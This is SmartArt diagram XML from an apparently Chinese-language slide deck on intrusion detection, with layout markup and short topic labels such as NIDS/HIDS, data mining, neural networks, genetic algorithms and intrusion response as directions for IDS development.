      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6528901" y="2309834"/>
          <a:ext cx="1829315" cy="1002801"/>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CN" altLang="en-US" sz="2400" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>文件完整性分析技术</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="6558272" y="2339205"/>
        <a:ext cx="1770573" cy="944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CA67-E843-4A88-B032-EEC3B0B9963E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4662426" y="537725"/>
          <a:ext cx="3648274" cy="1315580"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="1221493"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="3648274" y="1221493"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="3648274" y="1315580"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="508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5CFB158B-2A76-4C8B-AA32-C0643EE36651}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6410772" y="2990249"/>
          <a:ext cx="1715733" cy="839014"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="744926"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1715733" y="744926"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1715733" y="839014"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="003300"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{DD2A41E7-EB35-4A72-B880-2C4E031E5CEC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="6365052" y="2990249"/>
          <a:ext cx="91440" cy="827489"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="733401"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="54921" y="733401"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="54921" y="827489"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="003300"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{86952AA4-5A7C-45C0-B7A7-DB9E1BFA4C99}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4556587" y="2990249"/>
          <a:ext cx="1854185" cy="848636"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1854185" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1854185" y="754548"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="754548"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="848636"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="003300"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst/>
      </dsp:spPr>
      <dsp:style>
        <a:lnRef idx="2">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:lnRef>
        <a:fillRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:fillRef>
        <a:effectRef idx="0">
          <a:scrgbClr r="0" g="0" b="0"/>
        </a:effectRef>
        <a:fontRef idx="minor"/>
      </dsp:style>
    </dsp:sp>
    <dsp:sp modelId="{CD49B43D-ABC7-46C8-82C3-681297B4C7DB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4662426" y="537725"/>
          <a:ext cx="1748345" cy="1315580"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="0" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="0" y="1221493"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1748345" y="1221493"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="1748345" y="1315580"/>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0BA44529-A63A-4BFE-885E-0F789876865A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4616706" y="537725"/>
          <a:ext cx="91440" cy="1349639"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="45720" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="45720" y="1255551"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="53093" y="1255551"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="53093" y="1349639"/>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BD0C8646-58AF-4BF2-AF58-C33831BEB8BC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2856377" y="537725"/>
          <a:ext cx="1806049" cy="1331788"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="1806049" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="1806049" y="1237700"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="1237700"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="1331788"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="508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FE71098-3182-402D-8CD3-1657F5586277}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="986093" y="537725"/>
          <a:ext cx="3676333" cy="1315580"/>
        </a:xfrm>
        <a:custGeom>
          <a:avLst/>
          <a:gdLst/>
          <a:ahLst/>
          <a:cxnLst/>
          <a:rect l="0" t="0" r="0" b="0"/>
          <a:pathLst>
            <a:path>
              <a:moveTo>
                <a:pt x="3676333" y="0"/>
              </a:moveTo>
              <a:lnTo>
                <a:pt x="3676333" y="1221493"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="1221493"/>
              </a:lnTo>
              <a:lnTo>
                <a:pt x="0" y="1315580"/>
              </a:lnTo>
            </a:path>
          </a:pathLst>
        </a:custGeom>
        <a:noFill/>
        <a:ln w="50800" cap="flat" cmpd="sng" algn="ctr">
          <a:solidFill>
            <a:srgbClr val="002060"/>
          </a:solidFill>
          <a:prstDash val="solid"/>
          <a:miter lim="800000"/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="50800" dist="381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CE13E43E-07CF-4376-8B9B-A6CD91B4ED42}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3064560" y="-107206"/>
          <a:ext cx="3195732" cy="64493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FBB9D9-5389-4419-B3DA-B5F803EFAAC7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3177409" y="0"/>
          <a:ext cx="3195732" cy="644931"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1"/>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0" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>IDS</a:t>
          </a:r>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>的发展方向</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2800" b="0" i="0" kern="1200" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="C00000"/>
            </a:solidFill>
            <a:effectLst/>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3196298" y="18889"/>
        <a:ext cx="3157954" cy="607153"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D1339A8A-B60F-4639-AC29-6938B28BC0A8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="135942" y="1853306"/>
          <a:ext cx="1700303" cy="1088173"/>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56BF4-C331-4906-87AD-6742D94A9203}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="248790" y="1960512"/>
          <a:ext cx="1700303" cy="1088173"/>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altLang="en-US" sz="2100" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>宽带高速实时检测技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="1200" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="280661" y="1992383"/>
        <a:ext cx="1636561" cy="1024431"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E2FEE80E-66FF-4C35-9F5F-579399B41B8A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1974354" y="1869513"/>
          <a:ext cx="1764045" cy="1122445"/>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BFAAD-189D-4E90-813B-3DDAF13F11C1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2087203" y="1976719"/>
          <a:ext cx="1764045" cy="1122445"/>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altLang="en-US" sz="2100" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>大规模分布式检测技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="1200" baseline="0" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="2120078" y="2009594"/>
        <a:ext cx="1698295" cy="1056695"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6CCEA0C0-3D06-472A-BEE2-FF3EC5601C1E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3888808" y="1887364"/>
          <a:ext cx="1561983" cy="1103916"/>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5A37-7713-4CF7-B2CB-0F0456BE3473}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="4001657" y="1994571"/>
          <a:ext cx="1561983" cy="1103916"/>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数据挖掘</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>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技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="4033990" y="2026904"/>
        <a:ext cx="1497317" cy="1039250"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{885F89CA-0414-4CE7-BA90-D0620FC91B24}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5584554" y="1853306"/>
          <a:ext cx="1652436" cy="1136943"/>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CD2934-69D3-42E9-8472-75D517C29305}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5697403" y="1960512"/>
          <a:ext cx="1652436" cy="1136943"/>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更先进的</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>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检测算法</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5730703" y="1993812"/>
        <a:ext cx="1585836" cy="1070343"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{58F2A323-E817-42FA-8571-94A639BAAC01}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3740190" y="3838886"/>
          <a:ext cx="1632794" cy="886793"/>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8AD53C-1D5D-45BF-8D70-201111F24C6E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3853038" y="3946092"/>
          <a:ext cx="1632794" cy="886793"/>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sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>计算机</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="977900">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>免疫技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3879011" y="3972065"/>
        <a:ext cx="1580848" cy="834847"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B3025DA8-545F-4105-8F25-1351ACD510EC}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5716933" y="3817738"/>
          <a:ext cx="1406082" cy="929088"/>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B5183-2262-4052-B369-3146D709039A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="5829781" y="3924945"/>
          <a:ext cx="1406082" cy="929088"/>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sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>神经网络</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2200" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="977900">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2200" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="5856993" y="3952157"/>
        <a:ext cx="1351658" cy="874664"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{710F1BF2-9645-48F5-927A-75C0426D8802}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7436140" y="3829263"/>
          <a:ext cx="1380732" cy="890573"/>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10CF2-5F63-49E8-9FA1-86577DAD8C46}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7548989" y="3936470"/>
          <a:ext cx="1380732" cy="890573"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1"/>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100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" altLang="en-US" sz="2200" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>遗传算法</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7575073" y="3962554"/>
        <a:ext cx="1328564" cy="838405"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{F160C20B-CA02-4A23-92A9-8856245BAA71}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7590251" y="1853306"/>
          <a:ext cx="1440899" cy="1112558"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10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6562E-3F52-4BE5-8DC9-6791894DA8F7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7703100" y="1960512"/>
          <a:ext cx="1440899" cy="1112558"/>
        </a:xfrm>
        <a:prstGeom prst="roundRect">
          <a:avLst>
            <a:gd name="adj" fmla="val 10000"/>
          </a:avLst>
        </a:prstGeom>
        <a:solidFill>
          <a:schemeClr val="bg1"/>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入侵响应</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2100" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="933450">
            <a:lnSpc>
              <a:spcPct val="100000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPts val="0"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="zh-CN" sz="2100" kern="1200" dirty="0">
              <a:solidFill>
                <a:srgbClr val="003399"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
            </a:rPr>
            <a:t>技术</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2100" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="003399"/>
            </a:solidFill>
            <a:latin typeface="+mn-lt"/>
            <a:ea typeface="微软雅黑" pitchFamily="34" charset="-122"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7735686" y="1993098"/>
        <a:ext cx="1375727" cy="1047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A4148-2173-4EBC-B29F-B4FF34C67FB8}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="350" y="420526"/>
          <a:ext cx="1367939" cy="820763"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:solidFill>
          <a:srgbClr val="FFEC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NIDS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="350" y="420526"/>
        <a:ext cx="1367939" cy="820763"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{A8530C79-58EA-4EF3-ADF0-8CFE227BF2A7}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1505084" y="420526"/>
          <a:ext cx="1367939" cy="820763"/>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NIPS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1505084" y="420526"/>
        <a:ext cx="1367939" cy="820763"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{398A296C-DDBE-47A2-88A7-6BC9C0CC21AB}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="350" y="1378084"/>
          <a:ext cx="1367939" cy="820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HIDS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="350" y="1378084"/>
        <a:ext cx="1367939" cy="820763"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{457C8165-B03F-48EF-960E-B63295134D73}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr bwMode="white">
        <a:xfrm>
          <a:off x="1505084" y="1378084"/>
          <a:ext cx="1367939" cy="820763"/>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HIPS</a:t>
          </a:r>
          <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3600" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="1505084" y="1378084"/>
        <a:ext cx="1367939" cy="8207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A38D7-A794-4E72-8B21-71E3E456DC7D}"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48C87-023D-4E49-B603-34FECE4E8D7D}" type="slidenum">
